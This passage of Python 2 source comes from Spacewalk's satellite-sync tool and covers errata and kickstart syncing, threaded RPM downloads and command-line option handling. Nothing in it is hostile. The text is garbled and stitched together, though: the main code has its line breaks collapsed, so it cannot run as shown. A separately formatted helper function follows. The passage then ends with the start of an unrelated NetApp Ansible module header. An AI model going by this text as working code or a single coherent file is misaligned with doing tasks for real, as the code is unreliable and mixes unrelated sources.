relative_path): if self.mountpoint: s = xmlDiskSource.KickstartFileDiskSource(self.mountpoint) s.setID(kstree_label) s.set_relative_path(relative_path) return s.load() if CFG.ISS_PARENT: return self.xmlDataServer.getKickstartFile(kstree_label, relative_path) else: srv = xmlWireSource.RPCGetWireSource(self.systemid, self.sslYN, self.xml_dump_version) return srv.getKickstartFileStream(channel, kstree_label, relative_path) def _compute_missing_ks_files(self): coll = sync_handlers.KickstartableTreesCollection() missing_ks_files = {} # download files for the ks trees for channel, ktids in self._channel_kickstarts.items(): missing_ks_files[channel] = missing = [] for ktid in ktids: # No timestamp for kickstartable trees kt = coll.get_item(ktid, timestamp=None) assert kt is not None kt_label = kt['label'] base_path = kt['base_path'] files = kt['files'] for f in files: relative_path = f['relative_path'] dest_path = os.path.join(base_path, relative_path) timestamp = rhnLib.timestamp(f['last_modified']) file_size = f['file_size'] errcode = self._verify_file(dest_path, timestamp, file_size, f['checksum_type'], f['checksum']) if errcode != 0: # Have to download it val = (kt_label, base_path, relative_path, timestamp, file_size) missing.append(val) return missing_ks_files def import_kickstarts(self): """Imports the kickstart-related information""" missing_kickstarts = self._compute_missing_kickstarts() if not missing_kickstarts: log(1, messages.kickstart_import_nothing_to_do) return ks_count = len(missing_kickstarts) log(1, messages.kickstart_importing % ks_count) coll = sync_handlers.KickstartableTreesCollection() batch = [] for ks, timestamp in missing_kickstarts: ksobj = coll.get_item(ks, timestamp=timestamp) assert ksobj is not None if ksobj['org_id'] is not None: ksobj['org_id'] = OPTIONS.orgid or DEFAULT_ORG batch.append(ksobj) _importer = sync_handlers.import_kickstarts(batch) log(1, messages.kickstart_imported % ks_count) def _compute_not_cached_errata(self): missing_errata = {} # First, determine what has to be downloaded errata_collection = sync_handlers.ErrataCollection() for channel, errata in self._channel_errata.items(): missing_errata[channel] = [] if not errata: # Nothing to see here continue missing_errata[channel] = [eid for (eid, timestamp, _advisory_name) in errata if not errata_collection.has_erratum(eid, timestamp) or self.forceAllErrata] return missing_errata _query_get_db_errata = rhnSQL.Statement(""" select e.id, e.advisory_name, TO_CHAR(e.last_modified, 'YYYYMMDDHH24MISS') last_modified from rhnChannelErrata ce, rhnErrata e, rhnChannel c where c.label = :channel and ce.channel_id = c.id and ce.errata_id = e.id """) def _get_db_channel_errata(self): """ Fetch the errata stored in the local satellite's database. Returned as a hash of channel to another hash of advisory names to a tuple of errata id and last modified date. 
""" db_channel_errata = {} relevant = self._channel_req.get_requested_channels() h = rhnSQL.prepare(self._query_get_db_errata) for channel in relevant: db_channel_errata[channel] = ce = {} h.execute(channel=channel) while 1: row = h.fetchone_dict() if not row: break advisory_name = row['advisory_name'] erratum_id = row['id'] last_modified = rhnLib.timestamp(row['last_modified']) ce[advisory_name] = (erratum_id, last_modified) return db_channel_errata def _diff_errata(self): """ Fetch the errata for this channel""" db_channel_errata = self._get_db_channel_errata() relevant = self._channel_req.get_requested_channels() # Now get the channel's errata channel_errata = {} for chn in relevant: db_ce = db_channel_errata[chn] timestamp = self._get_channel_timestamp(chn) channel_obj = self._channel_collection.get_channel(chn, timestamp) errata_timestamps = channel_obj['errata_timestamps'] if errata_timestamps is None or self.forceAllErrata: # No unique key information, so assume we need all errata erratum_ids = channel_obj['errata'] errata = [(x, None, None) for x in erratum_ids] log(2, _("Grabbing all errata for channel %s") % chn) else: errata = [] # Check the advisory name and last modification for erratum in errata_timestamps: erratum_id = erratum['id'] last_modified = erratum['last_modified'] last_modified = rhnLib.timestamp(last_modified) advisory_name = erratum['advisory_name'] if db_ce.has_key(advisory_name): _foo, db_last_modified = db_ce[advisory_name] if last_modified == db_last_modified: # We already have this erratum continue errata.append((erratum_id, last_modified, advisory_name)) errata.sort() channel_errata[chn] = errata # Uniquify the errata already_seen_errata = set() for channel, errata in channel_errata.items(): uq_errata = set(errata) - already_seen_errata self._channel_errata[channel] = sorted(uq_errata) already_seen_errata.update(uq_errata) def _diff_db_errata(self): """ Compute errata that are missing from the satellite Kind of similar to diff_errata, if we had the timestamp and advisory information available """ errata_collection = sync_handlers.ErrataCollection() self._missing_channel_errata = missing_channel_errata = {} db_channel_errata = self._get_db_channel_errata() for channel, errata in self._channel_errata.items(): ch_erratum_ids = missing_channel_errata[channel] = [] for eid, timestamp, advisory_name in errata: if timestamp is not None: # Should have been caught by diff_errata ch_erratum_ids.append((eid, timestamp, advisory_name)) continue # timestamp is None, grab the erratum from the cache erratum = errata_collection.get_erratum(eid, timestamp) timestamp = rhnLib.timestamp(erratum['last_modified']) advisory_name = erratum['advisory_name'] db_erratum = db_channel_errata[channel].get(advisory_name) if db_erratum is None or db_erratum[1] != timestamp or \ self.forceAllErrata: ch_erratum_ids.append((eid, timestamp, advisory_name)) def download_errata(self): log(1, ["", _("Downloading errata data")]) if self.forceAllErrata: log(2, _("Forcing download of all errata data for requested channels.")) self._diff_errata() not_cached_errata = self._compute_not_cached_errata() stream_loader = StreamProducer( sync_handlers.get_errata_handler(), self.xmlDataServer, 'getErrataXmlStream') sorted_channels = sorted(not_cached_errata.items(), key=lambda x: x[0]) # sort by channel for channel, erratum_ids in sorted_channels: self._proces_batch(channel, erratum_ids[:], messages.erratum_parsing, stream_loader.process) stream_loader.close() # XXX This step should go away once the channel 
info contains the # errata timestamps and advisory names self._diff_db_errata() log(1, _("Downloading errata data complete")) # __private methods__ def _processWithProgressBar(self, batch, size, process_function, prompt=_('Downloading:'), nevermorethan=None, process_function_args=()): pb = ProgressBar(prompt=prompt, endTag=_(' - complete'), finalSize=size, finalBarLength=40, stream=sys.stdout) if CFG.DEBUG > 2: pb.redrawYN = 0 pb.printAll(1) ss = SequenceServer(batch, nevermorethan=(nevermorethan or self._batch_size)) while not ss.doneYN(): chunk = ss.getChunk() item_count = len(chunk) process_function(chunk, *process_function_args) ss.clearChunk() pb.addTo(item_count) pb.printIncrement() pb.printComplete() def _proces_batch(self, channel, batch, log_msg, process_function, prompt=_('Downloading:'), process_function_args=(), nevermorethan=None, is_slow=False): count = len(batch) if log_msg: log(1, log_msg % (channel, count or _('NONE RELEVANT'))) if not count: return if is_slow: log(1, messages.warning_slow) self._processWithProgressBar(batch, count, process_function, prompt, nevermorethan, process_function_args) def _import_packages_process(self, chunk, sources): batch = self._get_cached_package_batch(chunk, sources) # check to make sure the orgs exported are valid _validate_package_org(batch) try: sync_handlers.import_packages(batch, sources) except (SQLError, SQLSchemaError, SQLConnectError), e: # an SQL error is fatal... crash and burn exitWithTraceback(e, 'Exception caught during import', 13) def import_packages(self, sources=0): if sources: log(1, ["", _("Importing source package metadata")]) missing_channel_items = self._missing_channel_src_packages else: log(1, ["", _("Importing package metadata")]) missing_channel_items = self._missing_channel_packages sorted_channels = sorted(missing_channel_items.items(), key=lambda x: x[0]) # sort by channel for channel, packages in sorted_channels: self._proces_batch(channel, packages[:], messages.package_importing, self._import_packages_process, _('Importing: '), [sources]) return self._link_channel_packages() def _link_channel_packages(self): log(1, ["", messages.link_channel_packages]) short_package_collection = sync_handlers.ShortPackageCollection() _package_collection = sync_handlers.PackageCollection() uq_packages = {} for chn, package_ids in self._channel_packages_full.items(): for pid in package_ids: package = short_package_collection.get_package(pid) if not package: continue assert package is not None channel_obj = {'label': chn} if uq_packages.has_key(pid): # We've seen this package before - just add this channel # to it uq_packages[pid]['channels'].append(channel_obj) else: package['channels'] = [channel_obj] uq_packages[pid] = package uq_pkg_data = uq_packages.values() # check to make sure the orgs exported are valid _validate_package_org(uq_pkg_data) try: if OPTIONS.mount_point: # if OPTIONS.consider_full is not set interpret dump as incremental importer = sync_handlers.link_channel_packages(uq_pkg_data, strict=OPTIONS.consider_full) else: importer = sync_handlers.link_channel_packages(uq_pkg_data) except (SQLError, SQLSchemaError, SQLConnectError), e: # an SQL error is fatal... 
crash and burn exitWithTraceback(e, 'Exception caught during import', 14) return importer.affected_channels @staticmethod def _get_cached_package_batch(chunk, sources=0): """ short-circuit the most common case""" if not chunk: return [] short_package_collection = sync_handlers.ShortPackageCollection() if sources: package_collection = sync_handlers.SourcePackageCollection() else: package_collection = sync_handlers.PackageCollection() batch = [] for pid in chunk: package = package_collection.get_package(pid) if (package is None or package['last_modified'] != short_package_collection.get_package(pid) ['last_modified']): # not in the cache raise Exception(_("Package Not Found in Cache, Clear the Cache to \ Regenerate it.")) batch.append(package) return batch def import_errata(self): log(1, ["", _("Importing channel errata")]) errata_collection = sync_handlers.ErrataCollection() sorted_channels = sorted(self._missing_channel_errata.items(), key=lambda x: x[0]) # sort by channel_label for chn, errata in sorted_channels: log(2, _("Importing %s errata for channel %s.") % (len(errata), chn)) batch = [] for eid, timestamp, _advisory_name in errata: erratum = errata_collection.get_erratum(eid, timestamp) # bug 161144: it seems that incremental dumps can create an # errata collection None if erratum is not None: self._fix_erratum(erratum) batch.append(erratum) self._proces_batch(chn, batch, messages.errata_importing, sync_handlers.import_errata) @staticmethod def _fix_erratum(erratum): """ Replace the list of packages with references to short packages""" sp_coll = sync_handlers.ShortPackageCollection() pids = set(erratum['packages'] or []) # map all the pkgs objects to the erratum packages = [] # remove packages which are not in the export (e.g. archs we are not syncing) for pid in pids: if not sp_coll.has_package(pid): # Package not found, go on - may be part of a channel we don't # sync continue package = sp_coll.get_package(pid) packages.append(package) erratum['packages'] = packages if erratum['org_id'] is not None: erratum['org_id'] = OPTIONS.orgid or DEFAULT_ORG # Associate errata to only channels that are being synced # or are synced already imported_channels = _getImportedChannels() if OPTIONS.channel: imported_channels += OPTIONS.channel erratum['channels'] = [c for c in erratum['channels'] if c['label'] in imported_channels] # Now fix the files for errata_file in (erratum['files'] or []): errata_file_package = errata_file.get('package') errata_file_source_package = errata_file.get('source-package') if errata_file['file_type'] == 'RPM' and \ errata_file_package is not None: package = None if sp_coll.has_package(errata_file_package): package = sp_coll.get_package(errata_file_package) errata_file['pkgobj'] = package elif errata_file['file_type'] == 'SRPM' and \ errata_file_source_package is not None: # XXX misa: deal with source rpms errata_file['pkgobj'] = None def _fetch_packages(self, channel, missing_fs_packages, sources=0): short_package_collection = sync_handlers.ShortPackageCollection() if sources: # acronym = "SRPM" package_collection = sync_handlers.SourcePackageCollection() else: # acronym = "RPM" package_collection = sync_handlers.PackageCollection() self._failed_fs_packages = Queue.Queue() self._extinct_packages = Queue.Queue() pkgs_total = len(missing_fs_packages) pkg_current = 0 total_size = 0 queue = Queue.Queue() out_queue = Queue.Queue() lock = threading.Lock() # count size of missing packages for package_id, path in missing_fs_packages: package = 
package_collection.get_package(package_id) total_size = total_size + package['package_size'] queue.put((package_id, path)) log(1, messages.package_fetch_total_size % (self._bytes_to_fuzzy(total_size))) real_processed_size = processed_size = 0 real_total_size = total_size start_time = round(time.time()) all_threads = [] for _thread in range(4): t = ThreadDownload(lock, queue, out_queue, short_package_collection, package_collection, self, self._failed_fs_packages, self._extinct_packages, sources, channel) t.setDaemon(True) t.start() all_threads.append(t) while ([x for x in all_threads if x.isAlive()] and pkg_current < pkgs_total): try: (rpmManip, package, is_done) = out_queue.get(False, 0.1) except Queue.Empty: continue pkg_current = pkg_current + 1 if not is_done: # package failed to download or already exist on disk real_total_size -= package['package_size'] processed_size += package['package_size'] try: out_queue.task_done() except AttributeError: pass continue # Package successfully saved filename = os.path.basename(rpmManip.relative_path) # Determine downloaded size and remaining time size = package['package_size'] real_processed_size += size processed_size += size current_time = round(time.time()) # timedalta could not be multiplicated by float remain_time = (datetime.timedelta(seconds=current_time - start_time)) * \ ((real_total_size * 10000) / real_processed_size - 10000) / 10000 # cut off miliseconds remain_time = datetime.timedelta(remain_time.days, remain_time.seconds) log(1, messages.package_fetch_remain_size_time % (self._bytes_to_fuzzy(processed_size), self._bytes_to_fuzzy(total_size), remain_time)) log(1, messages.package_fetch_successful % (pkg_current, pkgs_total, filename, size)) try: out_queue.task_done() except AttributeError: pass extinct_count = self._extinct_packages.qsize() failed_count = self._failed_fs_packages.qsize() # Printing summary log(2, messages.package_fetch_summary % channel, notimeYN=1) log(2, messages.package_fetch_summary_success % (pkgs_total - extinct_count - failed_count), notimeYN=1) log(2, messages.package_fetch_summary_failed % failed_count, notimeYN=1) log(2, messages.package_fetch_summary_extinct % extinct_count, notimeYN=1) # Translate x bytes to string "x MB", "x GB" or "x kB" @staticmethod def _bytes_to_fuzzy(b): units = ['bytes', 'kiB', 'MiB', 'GiB', 'TiB', 'PiB'] base = 1024 fuzzy = b for unit in units: if fuzzy >= base: fuzzy = float(fuzzy) / base else: break int_len = len("%d" % fuzzy) fract_len = 3 - int_len # pylint: disable=W0631 return "%*.*f %s" % (int_len, fract_len, fuzzy, unit) def _get_package_stream(self, channel, package_id, nvrea, sources): """ returns (filepath, stream), so in the case of a "wire source", the return value is, of course, (None, stream) """ # Returns a package stream from disk if self.mountpoint: rpmFile = rpmsPath(package_id, self.mountpoint, sources) try: stream = open(rpmFile) except IOError, e: if e.errno != 2: # No such file or directory raise return (rpmFile, None) return (rpmFile, stream) # Wire stream if CFG.ISS_PARENT: stream = self.xmlDataServer.getRpm(nvrea, channel) else: rpmServer = xmlWireSource.RPCGetWireSource(self.systemid, self.sslYN, self.xml_dump_version) stream = rpmServer.getPackageStream(channel, nvrea) return (None, stream) class ThreadDownload(threading.Thread): def __init__(self, lock, queue, out_queue, short_package_collection, package_collection, syncer, failed_fs_packages, extinct_packages, sources, channel): threading.Thread.__init__(self) self.queue = queue self.out_queue = 
out_queue self.short_package_collection = short_package_collection self.package_collection = package_collection self.syncer = syncer self.failed_fs_packages = failed_fs_packages self.extinct_packages = extinct_packages self.sources = sources self.channel = channel self.lock = lock def run(self): while not self.queue.empty(): # grabs host from queue (package_id, path) = self.queue.get() package = self.package_collection.get_package(package_id) last_modified = package['last_modified'] checksum_type = package['checksum_type'] checksum = package['checksum'] package_size = package['package_size'] if not path: nevra = get_nevra(package) orgid = None if package['org_id']: orgid = OPTIONS.orgid or DEFAULT_ORG path = self.syncer._get_rel_package_path(nevra, orgid, self.sources, checksum_type, checksum) # update package path package['path'] = path self.package_collection.add_item(package) errcode = self.syncer._verify_file(path, rhnLib.timestamp(last_modified), package_size, checksum_type, checksum) if errcode == 0: # file is already there # do not count this size to time estimate try: self.queue.task_done() except AttributeError: pass self.out_queue.put((None, package, False)) continue cfg = config.initUp2dateConfig() rpmManip = RpmManip(package, path) nvrea = rpmManip.nvrea() # Retry a number of times, we may have network errors for _try in range(cfg['networkRetries']): self.lock.acquire() try: rpmFile, stream = self.syncer._get_package_stream(self.channel, package_id, nvrea, self.sources) except: self.lock.release() raise self.lock.release() if stream is None: # Mark the package as extinct self.extinct_packages.put(package_id) log(1, messages.package_fetch_extinct % (os.path.basename(path))) break # inner for try: rpmManip.write_file(stream) break # inner for except FileCreationError, e: msg = e.args[0] log2disk(-1, _("Unable to save file %s: %s") % ( rpmManip.full_path, msg)) # Try again continue # inner for else: # for # Ran out of iterations # Mark the package as failed and move on self.failed_fs_packages.put(package_id) log(1, messages.package_fetch_failed % (os.path.basename(path))) # Move to the next package try: self.queue.task_done() except AttributeError: pass self.out_queue.put((rpmManip, package, False)) continue if stream is None: # Package is extinct. 
Move on try: self.queue.task_done() except AttributeError: pass self.out_queue.put((rpmManip, package, False)) continue if self.syncer.mountpoint and not self.syncer.keep_rpms: # Channel dumps import; try to unlink to preserve disk space # rpmFile is always returned by _get_package_stream for # disk-based imports assert(rpmFile is not None) try: os.unlink(rpmFile) except (OSError, IOError): pass # signals to queue job is done try: self.queue.task_done() except AttributeError: pass self.out_queue.put((rpmManip, package, True)) class StreamProducer: def __init__(self, handler, data_source_class, source_func): self.handler = handler self.is_disk_loader = data_source_class.is_disk_loader() if self.is_disk_loader: self.loader = getattr(data_source_class, source_func)() else: self.loader = getattr(data_source_class, source_func) self._args = () def set_args(self, *args): self._args = args def close(self): self.handler.close() def process(self, batch): if self.is_disk_loader: for oid in batch: self.loader.setID(oid) stream = self.loader.load() self.handler.process(stream) else: # Only use the extra arguments if needed, for now args = self._args or (batch, ) stream = self.loader(*args) self.handler.process(stream) def _verifyPkgRepMountPoint(): """ Checks the base package repository directory tree for existance and permissions. Creates base dir if need be, and chowns to apache.root (required for rhnpush). """ if not CFG.MOUNT_POINT: # Incomplete configuration log(-1, _("ERROR: server.mount_point not set in the configuration file")) sys.exit(16) if not os.path.exists(fileutils.cleanupAbsPath(CFG.MOUNT_POINT)): log(-1, _("ERROR: server.mount_point %s do not exist") % fileutils.cleanupAbsPath(CFG.MOUNT_POINT)) sys.exit(26) if not os.path.exists(fileutils.cleanupAbsPath(CFG.MOUNT_POINT + '/' + CFG.PREPENDED_DIR)): log(-1, _("ERROR: path under server.mount_point (%s) do not exist") % fileutils.cleanupAbsPath(CFG.MOUNT_POINT + '/' + CFG.PREPENDED_DIR)) sys.exit(26) def _validate_package_org(batch): """Validate the orgids associated with packages. If its redhat channel default to Null org If custom channel and org is specified use that. If custom and package org is not valid default to org 1 """ orgid = OPTIONS.orgid or None for pkg in batch: if not pkg['org_id'] or pkg['org_id'] == 'None': # default to Null so do nothing pkg['org_id'] = None elif orgid: # if options.orgid specified use it pkg['org_id'] = orgid else: # org from server is not valid pkg['org_id'] = DEFAULT_ORG def _getImportedChannels(): "Retrieves the channels already imported in the satellite's database" try: if OPTIONS.include_custom_channels: h = rhnSQL.prepare("""select label from rhnChannel""") else: h = rhnSQL.prepare("""select label from rhnChannel where org_id is null""") h.execute() return [x['label'] for x in h.fetchall_dict() or []] except (SQLError, SQLSchemaError, SQLConnectError), e: # An SQL error is fatal... 
crash and burn exitWithTraceback(e, 'SQL ERROR during xml processing', 17) return [] def getDbIssParent(): sql = "select label from rhnISSMaster where is_current_master = 'Y'" h = rhnSQL.prepare(sql) h.execute() row = h.fetchone_dict() if not row: return None return row['label'] def getDbCaChain(master): sql = "select ca_cert from rhnISSMaster where label = :label" h = rhnSQL.prepare(sql) h.execute(label=master) row = h.fetchone_dict() if not row: return None return row['ca_cert'] def processCommandline(): "process the commandline, setting the OPTIONS object" log2disk(-1, _("Commandline: %s") % repr(sys.argv)) optionsTable = [ Option('--batch-size', action='store', help=_('DEBUG ONLY: max. batch-size for XML/database-import processing (1..%s).' + '"man satellite-sync" for more information.') % SequenceServer.NEVER_MORE_THAN), Option('--ca-cert', action='store', help=_('alternative SSL CA Cert (fullpath to cert file)')), Option('-c', '--channel', action='append', help=_('process data for this channel only')), Option('--consider-full', action='store_true', help=_('disk dump will be considered to be a full export; ' 'see "man satellite-sync" for more information.')), Option('--include-custom-channels', action='store_true', help=_('existing custom channels will also be synced (unless -c is used)')), Option('--debug-level', action='store', help=_('override debug level set in /etc/rhn/rhn.conf (which is currently set at %s).') % CFG.DEBUG), Option('--dump-version', action='store', help=_("requested version of XML dump (default: %s)") % constants.PROTOCOL_VERSION), Option('--email', action='store_true', help=_('e-mail a report of what was synced/imported')), Option('--force-all-errata', action='store_true', help=_('forcibly process all (not a diff of) errata metadata')), Option('--force-all-packages', action='store_true', help=_('forcibly process all (not a diff of) package metadata')), Option('--http-proxy', action='store', help=_('alternative http proxy (hostname:port)')), Option('--http-proxy-username', action='store', help=_('alternative http proxy username')), Option('--http-proxy-password', action='store', help=_('alternative http proxy password')), Option('--iss-parent', action='store', help=_('parent satellite to import content from')), Option('-l', '--list-channels', action='store_true', help=_('list all available channels and exit')), Option('--list-error-codes', action='store_true', help=_("help on all error codes satellite-sync returns")), Option('-m', '--mount-point', action='store', help=_('source mount point for import - disk update only')), Option('--no-errata', action='store_true', help=_('do not process errata data')), Option('--no-kickstarts', action='store_true', help=_('do not process kickstart data (provisioning only)')), Option('--no-packages', action='store_true', help=_('do not process full package metadata')), Option('--no-rpms', action='store_true', help=_('do not download, or process any RPMs')), Option('--no-ssl', action='store_true', help=_('turn off SSL (not recommended)')), Option('--orgid', action='store', help=_('org to which the sync imports data. 
defaults to the admin account')), Option('-p', '--print-configuration', action='store_true', help=_('print the configuration and exit')), Option('--rhn-cert', action='store', help=_('satellite certificate to import ') + _('(use with --mount-point only)')), Option('-s', '--server', action='store', help=_('alternative server with which to connect (hostname)')), Option('--step', action='store', help=_('synchronize to this step (man satellite-sync for more info)')), Option('--systemid', action='store', help=_("DEBUG ONLY: alternative path to digital system id")), Option('--traceback-mail', action='store', help=_('alternative email address(es) for sync output (--email option)')), Option('--keep-rpms', action='store_true', help=_('do not remove rpms when importing from local dump')), Option('--master', action='store', help=_('the fully qualified domain name of the master Satellite. ' 'Valid with --mount-point only. ' 'Required if you want to import org data and channel permissions.')), ] optionParser = OptionParser(option_list=optionsTable) global OPTIONS OPTIONS, args = optionParser.parse_args() # we take extra commandline arguments that are not linked to an option if args: msg = _("ERROR: these arguments make no sense in this context (try --help): %s") % repr(args) log2stderr(-1, msg, 1, 1) sys.exit(19) # # process anything CFG related (db, debug, server, and print) # try: rhnSQL.initDB() rhnSQL.clear_log_id() rhnSQL.set_log_auth_login('SETUP') except (SQLError, SQLSchemaError, SQLConnectError), e: # An SQL error is fatal... crash and burn log(-1, _("ERROR: Can't connect to the database: %s") % e, stream=sys.stderr) log(-1, _("ERROR: Check if your database is running."), stream=sys.stderr) sys.exit(20) CFG.set("ISS_Parent", getDbIssParent()) CFG.set("TRACEBACK_MAIL", OPTIONS.traceback_mail or CFG.TRACEBACK_MAIL) CFG.set("RHN_PARENT", idn_ascii_to_pune(OPTIONS.iss_parent or OPTIONS.server or CFG.ISS_PARENT or CFG.RHN_PARENT)) if OPTIONS.server and not OPTIONS.iss_parent: # server option on comman line should override ISS parent from config CFG.set("ISS_PARENT", None) else: CFG.set("ISS_PARENT", idn_ascii_to_pune(OPTIONS.iss_parent or CFG.ISS_PARENT)) CFG.set("ISS_CA_CHAIN", OPTIONS.ca_cert or getDbCaChain(CFG.RHN_PARENT) or CFG.CA_CHAIN) CFG.set("HTTP_PROXY", idn_ascii_to_pune(OPTIONS.http_proxy or CFG.HTTP_PROXY)) CFG.set("HTTP_PROXY_USERNAME", OPTIONS.http_proxy_username or CFG.HTTP_PROXY_USERNAME) CFG.set("HTTP_PROXY_PASSWORD", OPTIONS.http_proxy_password or CFG.HTTP_PROXY_PASSWORD) CFG.set("CA_CHAIN", OPTIONS.ca_cert or CFG.CA_CHAIN) # check the validity of the debug level if OPTIONS.debug_level: debugRange = 6 try: debugLevel = int(OPTIONS.debug_level) if not (0 <= debugLevel <= debugRange): raise RhnSyncException, "exception will be caught", sys.exc_info()[2] except KeyboardInterrupt, e: raise # pylint: disable=E0012, W0703 except Exception: msg = [_("ERROR: --debug-level takes an in integer value within the range %s.") % repr(tuple(range(debugRange + 1))), _(" 0 - little logging/messaging."), _(" 1 - minimal logging/messaging."), _(" 2 - normal level of logging/messaging."), _(" 3 - lots of logging/messaging."), _(" 4+ - excessive logging/messaging.")] log(-1, msg, 1, 1, sys.stderr) sys.exit(21) else: CFG.set('DEBUG', debugLevel) initLOG(CFG.LOG_FILE, debugLevel) if OPTIONS.print_configuration: CFG.show() sys.exit(0) if OPTIONS.master: if not OPTIONS.mount_point: msg = _("ERROR: The --master option is only valid with the --mount-point option") log2stderr(-1, msg, cleanYN=1) sys.exit(28) 
elif CFG.ISS_PARENT: OPTIONS.master = CFG.ISS_PARENT if OPTIONS.orgid: # verify if its a valid org orgs = [a['id'] for a in satCerts.get_all_orgs()] if int(OPTIONS.orgid) not in orgs: msg = _("ERROR: Unable to lookup Org Id %s") % OPTIONS.orgid log2stderr(-1, msg, cleanYN=1) sys.exit(27) # the action dictionary used throughout actionDict = {} if OPTIONS.list_channels: if OPTIONS.step: log(-1, _("WARNING: --list-channels option overrides any --step option. --step ignored.")) OPTIONS.step = 'channels' actionDict['list-channels'] = 1 else: actionDict['list-channels'] = 0 # # validate the --step option and set up the hierarchy of sync process steps. # stepHierarchy = Runner.step_hierarchy # if no step stated... we do all steps. if not OPTIONS.step: OPTIONS.step = stepHierarchy[-1] if OPTIONS.step not in stepHierarchy: log2stderr(-1, _("ERROR: '%s' is not a valid step. See 'man satellite-sync' for more detail.") % OPTIONS.step, 1, 1) sys.exit(22) # XXX: --source is deferred for the time being #OPTIONS.source = OPTIONS.step in sourceSteps # populate the action dictionary for step in stepHierarchy: actionDict[step] = 1 if step == OPTIONS.step: break # make sure *all* steps in the actionDict are handled. for step in stepHierarchy: actionDict[step] = actionDict.has_key(step) channels = OPTIONS.channel or [] if OPTIONS.list_channels: actionDict['channels'] = 1 actionDict['arches'] = 0 actionDict['channel-families'] = 1 channels = [] # Cleanup selected channels. # if no channels selected, the default is to "freshen", or select the # already existing channels in the local database. if not channels: channels = _getImportedChannels() if not channels: if actionDict['channels'] and not actionDict['list-channels']: msg = _("ERROR: No channels currently imported; try satellite-sync --list-channels; " + "then satellite-sync -c chn0 -c chn1...") log2disk(-1, msg) log2stderr(-1, msg, cleanYN=1) sys.exit(0) # add all the "other" actions specified. 
otherActions = {"no_rpms": 'no-rpms', #"no_srpms" : 'no-srpms', "no_packages": 'no-packages', #"no_source_packages" : 'no-source-packages', "no_errata": 'no-errata', "no_kickstarts": 'no-kickstarts', "force_all_packages": 'force-all-packages', "force_all_errata": 'force-all-errata', 'no_ssl': 'no-ssl'} for oa in otherActions.keys(): if getattr(OPTIONS, oa): actionDict[otherActions[oa]] = 1 else: actionDict[otherActions[oa]] = 0 if actionDict['no-kickstarts']: actionDict['kickstarts'] = 0 if actionDict['no-errata']: actionDict['errata'] = 0 # if actionDict['no-source-packages']: actionDict['source-packages'] = 0 if actionDict['no-packages']: actionDict['packages'] = 0 actionDict['short'] = 0 actionDict['download-packages'] = 0 actionDict['rpms'] = 0 if actionDict['no-rpms']: actionDict['rpms'] = 0 # if actionDict['no-srpms']: actionDict['srpms'] = 0 if not OPTIONS.master: actionDict['orgs'] = 0 if OPTIONS.batch_size: try: OPTIONS.batch_size = int(OPTIONS.batch_size) if OPTIONS.batch_size not in range(1, 51): raise ValueError(_("ERROR: --batch-size must have a value within the range: 1..50")) except (ValueError, TypeError): # int(None) --> TypeError # int('a') --> ValueError raise ValueError(_("ERROR: --batch-size must have a value within the range: 1..50")), \ None, sys.exc_info()[2] OPTIONS.mount_point = fileutils.cleanupAbsPath(OPTIONS.mount_point) OPTIONS.rhn_cert = fileutils.cleanupAbsPath(OPTIONS.rhn_cert) OPTIONS.systemid = fileutils.cleanupAbsPath(OPTIONS.systemid) if OPTIONS.rhn_cert: if not OPTIONS.mount_point: msg = _("ERROR: --rhn-cert requires --mount-point") log2stderr(-1, msg, cleanYN=1) sys.exit(23) if not os.path.isfile(OPTIONS.rhn_cert): msg = _("ERROR: no such file %s") % OPTIONS.rhn_cert log2stderr(-1, msg, cleanYN=1) sys.exit(24) if OPTIONS.mount_point: if not os.path.isdir(OPTIONS.mount_point): msg = _("ERROR: no such directory %s") % OPTIONS.mount_point log2stderr(-1, msg, cleanYN=1) sys.exit(25) if OPTIONS.list_error_codes: msg = [_("Error Codes: Returned codes means:"), _(" -1 - Could not lock file or KeyboardInterrupt or SystemExit"), _(" 0 - User interrupted or intentional exit"), _(" 1 - attempting to run more than one instance of satellite-sync."), _(" 2 - Unable to find synchronization tools."), _(" 3 - a general socket exception occurred"), _(" 4 - an SSL error occurred. 
Recheck your SSL settings."), _(" 5 - RHN error"), _(" 6 - unhandled exception occurred"), _(" 7 - unknown sync error"), _(" 8 - ERROR: must be root to execute"), _(" 9 - rpclib fault during synchronization init"), _(" 10 - synchronization init error"), _(" 11 - Error parsing XML stream"), _(" 12 - Channel do not exist"), _(" 13 - SQL error during importing package metadata"), _(" 14 - SQL error during linking channel packages"), _(" 15 - SQL error during xml processing"), _(" 16 - server.mount_point not set in the configuration file"), _(" 17 - SQL error during retrieving the channels already imported in the satellite's database"), _(" 18 - Wrong db connection string in rhn.conf"), _(" 19 - Bad arguments"), _(" 20 - Could not connect to db."), _(" 21 - Bad debug level"), _(" 22 - Not valid step"), _(" 23 - error: --rhn-cert requires --mount-point"), _(" 24 - no such file"), _(" 25 - no such directory"), _(" 26 - mount_point does not exist"), _(" 27 - No such org"), _(" 28 - error: --master is only valid with --mount-point"), ] log(-1, msg, 1, 1, sys.stderr) sys.exit(0) if OPTIONS.dump_version: OPTIONS.dump_version = str(OPTIONS.dump_version) if OPTIONS.dump_version not in constants.ALLOWED_SYNC_PROTOCOL_VERSIONS: msg = _("ERROR: unknown dump version, try one of %s") % \ constants.ALLOWED_SYNC_PROTOCOL_VERSIONS log2stderr(-1, msg, cleanYN=1) sys.exit(19) # return the dictionary of actions, channels return actionDict, channels def formatDateTime(dtstring=None, dt=None): """ Format the date time using your locale settings. This assume that your setlocale has been alread called. """ if not dt: dt = time.strptime(dtstring, '%Y%m%d%H%M%S') return time.strftime("%c", dt) if __name__ == '__main__': sys.stderr.write("!!! running this directly is advisable *ONLY* for testing" " purposes !!!\n") try: sys.exit(Runner().main() or 0) except (KeyboardInterrupt, SystemExit), ex: sys.exit(ex) except Exception: # pylint: disable=E0012, W0703 from spacewalk.common.rhnTB import fetchTraceback tb = 'TRACEBACK: ' + fetchTraceback(with_locals=1) log2disk(-1, tb) log2email(-1, tb) sendMail() sys.exit(-1)
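

# A small illustration of the timestamp format handled by formatDateTime()
# above: the sync exchanges last-modified times as compact 'YYYYMMDDHH24MISS'
# strings (see the TO_CHAR(..., 'YYYYMMDDHH24MISS') SQL queries).  This sketch
# only mirrors that conversion with the standard library; the literal value is
# illustrative, not taken from a real sync run.
def _format_datetime_example():
    import time
    dt = time.strptime('20170910180100', '%Y%m%d%H%M%S')
    # Rendered with the current locale, e.g. 'Sun Sep 10 18:01:00 2017'
    return time.strftime('%c', dt)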
#!/usr/bin/python

# (c) 2017, NetApp, Inc
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
